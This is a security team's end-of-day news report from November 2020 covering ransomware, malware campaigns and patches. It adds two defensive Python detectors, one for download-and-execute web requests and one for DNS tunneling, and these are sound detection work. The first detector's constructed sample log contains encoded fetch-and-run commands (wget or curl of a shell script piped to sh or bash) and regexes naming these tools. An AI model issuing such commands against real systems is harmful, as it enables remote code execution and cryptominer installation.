End-of-Day report
Timeframe: Friday 06-11-2020 18:00 - Monday 09-11-2020 18:00
Handler: Thomas Pribitzer
Co-Handler: Stephan Richter
News
Hackers have repeatedly exfiltrated source code from SonarQube instances
The FBI had already warned in October about attacks on installations belonging to, among others, US government agencies, but also to private companies.
https://heise.de/-4951630
Let's Encrypt: Old Android devices will run into problems with millions of sites
The certificate change at Let's Encrypt is causing problems for a third of all Android devices. The workaround is to use Firefox.
https://www.golem.de/news/let-s-encrypt-alte-android-geraete-bekommen-probleme-mit-millionen-seiten-2011-151987-rss.html
New Pay2Key ransomware encrypts networks within one hour
A new ransomware called Pay2Key has been targeting organizations from Israel and Brazil, encrypting their networks within an hour in targeted attacks still under investigation.
https://www.bleepingcomputer.com/news/security/new-pay2key-ransomware-encrypts-networks-within-one-hour/
How Ryuk Ransomware operators made $34 million from one victim
One hacker group that is targeting high-revenue companies with Ryuk ransomware received $34 million from one victim in exchange for the decryption key that unlocked their computers.
https://www.bleepingcomputer.com/news/security/how-ryuk-ransomware-operators-made-34-million-from-one-victim/
Gitpaste-12 Worm Targets Linux Servers, IoT Devices
The newly discovered malware uses GitHub and Pastebin to house component code, and harbors 12 different initial attack vectors.
https://threatpost.com/gitpaste-12-worm-linux-servers-iot-devices/161016/
Adventures in Anti-Gravity
Here we deconstruct a Mac variant of GravityRAT (the cross-platform spyware, known to target the Indian armed forces).
https://objective-see.com/blog/blog_0x5B.html
Cryptojacking Targeting WebLogic TCP/7001, (Sat, Nov 7th)
This past week I got some interesting logs targeting TCP/7001 (WebLogic CVE-2020-14882 - see previous diary[1][2]) looking to download and launch a shell script to install various cryptominers on the target. The shell script targets SELinux-compatible hosts, likely CentOS/RedHat, Ubuntu, etc., to install various cryptominer applications.
https://isc.sans.edu/diary/rss/26768
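The diary describes requests to TCP/7001 whose payload fetches a shell script and runs it. The following is an added example, not code from the ISC diary: it walks constructed access-log lines (server port prepended to a combined-log record), URL-decodes each request path repeatedly (attackers often double-encode), and flags requests that combine a downloader (wget/curl) with a shell execution construct (pipe to sh/bash, $(curl ...) subshell, or bash -c). The paths, hosts and IPs are constructed; the patterns are generic download-and-execute heuristics, not a signature for CVE-2020-14882 itself.

```python
"""Flag web requests that try to download and run a remote shell script.

Added example for the ISC cryptojacking item; not code from the diary.
Log lines, paths and hosts below are constructed; the regexes are
generic download-and-execute heuristics rather than a CVE signature.
"""
import re
from urllib.parse import unquote

# Constructed sample: '<port> <client> - - [<ts>] "<method> <path> HTTP/1.1" <status> <bytes>'
SAMPLE_LOG = """\
7001 203.0.113.10 - - [07/Nov/2020:10:12:01 +0000] "GET / HTTP/1.1" 200 3122
7001 198.51.100.7 - - [07/Nov/2020:10:12:44 +0000] "POST /probe?cmd=wget%20-q%20-O-%20http%3A%2F%2F192.0.2.5%2Fz.sh%7Csh HTTP/1.1" 404 512
7001 198.51.100.7 - - [07/Nov/2020:10:13:02 +0000] "POST /probe?cmd=curl%2520-s%2520http%253A%252F%252F192.0.2.5%252Fz.sh%2520%257C%2520bash HTTP/1.1" 404 512
443 192.0.2.77 - - [07/Nov/2020:10:14:15 +0000] "GET /index.html HTTP/1.1" 200 1043
7001 192.0.2.88 - - [07/Nov/2020:10:15:20 +0000] "GET /probe?q=bash%20-c%20%22%24%28curl%20-fsSL%20http%3A%2F%2F192.0.2.6%2Fm.sh%29%22 HTTP/1.1" 404 512
7001 203.0.113.44 - - [07/Nov/2020:10:16:09 +0000] "GET /?tool=wget HTTP/1.1" 404 512
"""

# One access-log record (port, client, timestamp, method, path, status).
LOG_RE = re.compile(
    r'^(?P<port>\d+) (?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+$'
)

# Indicators checked against the fully URL-decoded request path.
INDICATORS = [
    ('downloader',    re.compile(r'\b(?:wget|curl)\b')),          # fetches something
    ('pipe_to_shell', re.compile(r'\|\s*(?:ba)?sh\b')),            # ... | sh / | bash
    ('subshell',      re.compile(r'\$\(\s*(?:curl|wget)\b')),      # $(curl ...)
    ('bash_c',        re.compile(r'\bbash\s+-c\b')),               # bash -c "..."
]
URL_RE = re.compile(r'''https?://[^\s"'|;&)]+''')


def fully_decode(s, max_rounds=3):
    """URL-decode until the string stops changing (handles %2520-style double encoding)."""
    for _ in range(max_rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def find_download_and_run(log_text, ports=None):
    """Return records whose decoded path shows a downloader plus a shell-execution construct.

    ports: optional set of server ports to restrict the scan to (e.g. {7001}).
    """
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        rec = m.groupdict()
        if ports and int(rec['port']) not in ports:
            continue
        payload = fully_decode(rec['path'])
        indicators = [name for name, rx in INDICATORS if rx.search(payload)]
        # A bare 'wget' in a query string is not enough; require an execution construct too.
        if 'downloader' in indicators and len(indicators) > 1:
            hits.append({
                'port': int(rec['port']),
                'client': rec['client'],
                'ts': rec['ts'],
                'method': rec['method'],
                'decoded_path': payload,
                'indicators': indicators,
                'urls': URL_RE.findall(payload),   # where the script would be pulled from
            })
    return hits


if __name__ == '__main__':
    for hit in find_download_and_run(SAMPLE_LOG, ports={7001}):
        print(hit['client'], hit['indicators'], hit['urls'])
```

The extracted URLs are the useful pivot: they identify the staging host of the script and can be fed into egress filtering or passive DNS lookups, while the undecoded path alone would hide the `|` behind `%7C` or `%257C`.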
How Attackers Brush Up Their Malicious Scripts, (Mon, Nov 9th)
On Friday, I received a bunch of alerts from one of my YARA hunting rules. Several samples were submitted from the same account (through the VT API), from the same country (US), and in a very short period of time. All the submitted files were OLE2 files containing a malicious macro. All of them had a low VT score, so it deserved some investigation. I downloaded the samples and had a look at them.
https://isc.sans.edu/diary/rss/26770
When Threat Actors Fly Under the Radar: Vatet, PyXie and Defray777
Vatet, PyXie and Defray777 are all associated with a financially motivated threat group. We aim to get these malware families on the radar.
https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/
xHunt Campaign: Newly Discovered Backdoors Using Deleted Email Drafts and DNS Tunneling for Command and Control
We observed evidence that the xHunt campaign used two backdoors on a compromised Microsoft Exchange Server at an organization in Kuwait.
https://unit42.paloaltonetworks.com/xhunt-campaign-backdoors/
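DNS tunneling for command and control, as mentioned in the xHunt item, encodes data into the labels of queries for attacker-controlled domains. The following is an added example, not code from the Unit 42 report and not a description of the xHunt backdoors: it runs a generic tunneling heuristic over a constructed DNS query log, grouping queries by (client, parent domain) and flagging groups with many distinct, long, high-entropy subdomain labels. The log format, hosts and thresholds are assumptions; the parent-domain split (last two labels) is a simplification that a real deployment would replace with a public suffix list.

```python
"""Heuristic DNS-tunneling detector over a constructed query log.

Added example for the xHunt item; not code from Unit 42 and not tied to
that campaign. Log format ("<ts> <client> <qname> <qtype>"), sample
data and thresholds are assumptions.
"""
import math
from collections import defaultdict

# Constructed sample: normal lookups from 10.0.0.5, tunnel-like TXT queries from 10.0.0.9.
SAMPLE_QUERIES = """\
2020-11-09T08:00:01Z 10.0.0.5 www.example.com A
2020-11-09T08:00:02Z 10.0.0.5 mail.example.com A
2020-11-09T08:00:03Z 10.0.0.5 api.example.com AAAA
2020-11-09T08:00:04Z 10.0.0.5 cdn.example.com A
2020-11-09T08:01:00Z 10.0.0.9 ge2dknzugq3dgojqgyzdcmjq.example.net TXT
2020-11-09T08:01:01Z 10.0.0.9 mfrgg43jo5uwm2bqnfyxa3dp.example.net TXT
2020-11-09T08:01:02Z 10.0.0.9 nzsxizltmfzge5bqgezdgnjq.example.net TXT
2020-11-09T08:01:03Z 10.0.0.9 pfxgsy3bmfsgezlmmnsgkzlf.example.net TXT
2020-11-09T08:01:04Z 10.0.0.9 ondqmjvwgy3lmfzc4mnwgq3d.example.net TXT
2020-11-09T08:02:00Z 10.0.0.9 www.example.org A
"""


def shannon_entropy(s):
    """Bits per character; encoded payloads score far higher than hostnames like 'www'."""
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def split_qname(qname):
    """Split into (subdomain part, parent domain). Simplification: parent = last two labels."""
    labels = qname.rstrip('.').lower().split('.')
    if len(labels) < 3:
        return '', '.'.join(labels)
    return '.'.join(labels[:-2]), '.'.join(labels[-2:])


def summarize(log_text):
    """Aggregate per (client, parent domain): query count, distinct subdomains, lengths, entropies, TXT count."""
    stats = defaultdict(lambda: {'queries': 0, 'subdomains': set(), 'lens': [], 'entropies': [], 'txt': 0})
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue                      # skip malformed records
        _ts, client, qname, qtype = parts
        sub, base = split_qname(qname)
        s = stats[(client, base)]
        s['queries'] += 1
        s['subdomains'].add(sub)
        s['lens'].append(len(sub))
        s['entropies'].append(shannon_entropy(sub.replace('.', '')))
        if qtype.upper() == 'TXT':
            s['txt'] += 1
    return stats


def suspicious_tunnels(log_text, min_distinct=4, min_len=16.0, min_entropy=3.0):
    """Flag (client, domain) pairs with many distinct, long, high-entropy subdomains.

    All three conditions must hold, so a CDN with a handful of short hostnames
    is not reported. Thresholds are assumptions and need tuning per environment.
    """
    flagged = []
    for (client, base), s in summarize(log_text).items():
        n = s['queries']
        distinct = len(s['subdomains'])
        mean_len = sum(s['lens']) / n
        mean_ent = sum(s['entropies']) / n
        if distinct >= min_distinct and mean_len >= min_len and mean_ent >= min_entropy:
            flagged.append({
                'client': client,
                'domain': base,
                'queries': n,
                'distinct_subdomains': distinct,
                'mean_label_len': round(mean_len, 1),
                'mean_entropy': round(mean_ent, 2),
                'txt_fraction': round(s['txt'] / n, 2),   # TXT-heavy traffic is a second hint
            })
    return sorted(flagged, key=lambda r: (r['client'], r['domain']))


if __name__ == '__main__':
    for rec in suspicious_tunnels(SAMPLE_QUERIES):
        print(rec)
```

The entropy and length checks catch base32/hex-encoded payloads; the distinct-subdomain count separates a tunnel (every query carries new data, so every name is new) from a chatty but legitimate service that reuses a few hostnames.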
Vulnerabilities
Cisco patches serious vulnerability in Webex Meetings for Windows
The vulnerability came to light during internal testing. A local attacker can execute malicious code. Further vulnerabilities affect the Web Network Recording Player and Webex Player.
https://www.zdnet.de/88389577/cisco-stopft-schwerwiegende-luecke-in-webex-meetings-fuer-windows/
WordPress Sites Open to Code Injection Attacks via Welcart e-Commerce Bug
The shopping cart application contains a PHP object-injection bug.
https://threatpost.com/wordpress_open_to_attacks_welcart_bug/161037/
Security updates for Monday
Security updates have been issued by CentOS (bind, firefox, java-1.8.0-openjdk, kernel, libX11, qemu-kvm, thunderbird, and xorg-x11-server), Debian (guacamole-server, krb5, libexif, poppler, raptor2, and sympa), Fedora (blueman, chromium, freetype, galera, krb5, libtpms, mariadb, mariadb-connector-c, pngcheck, and salt), Mageia (blueman, docker, fontforge, junit, libproxy, libuv, mariadb, suricata, and webmin), openSUSE (apache-commons-httpclient, bluez, gnome-settings-daemon, gnome-shell, [...]
https://lwn.net/Articles/836676/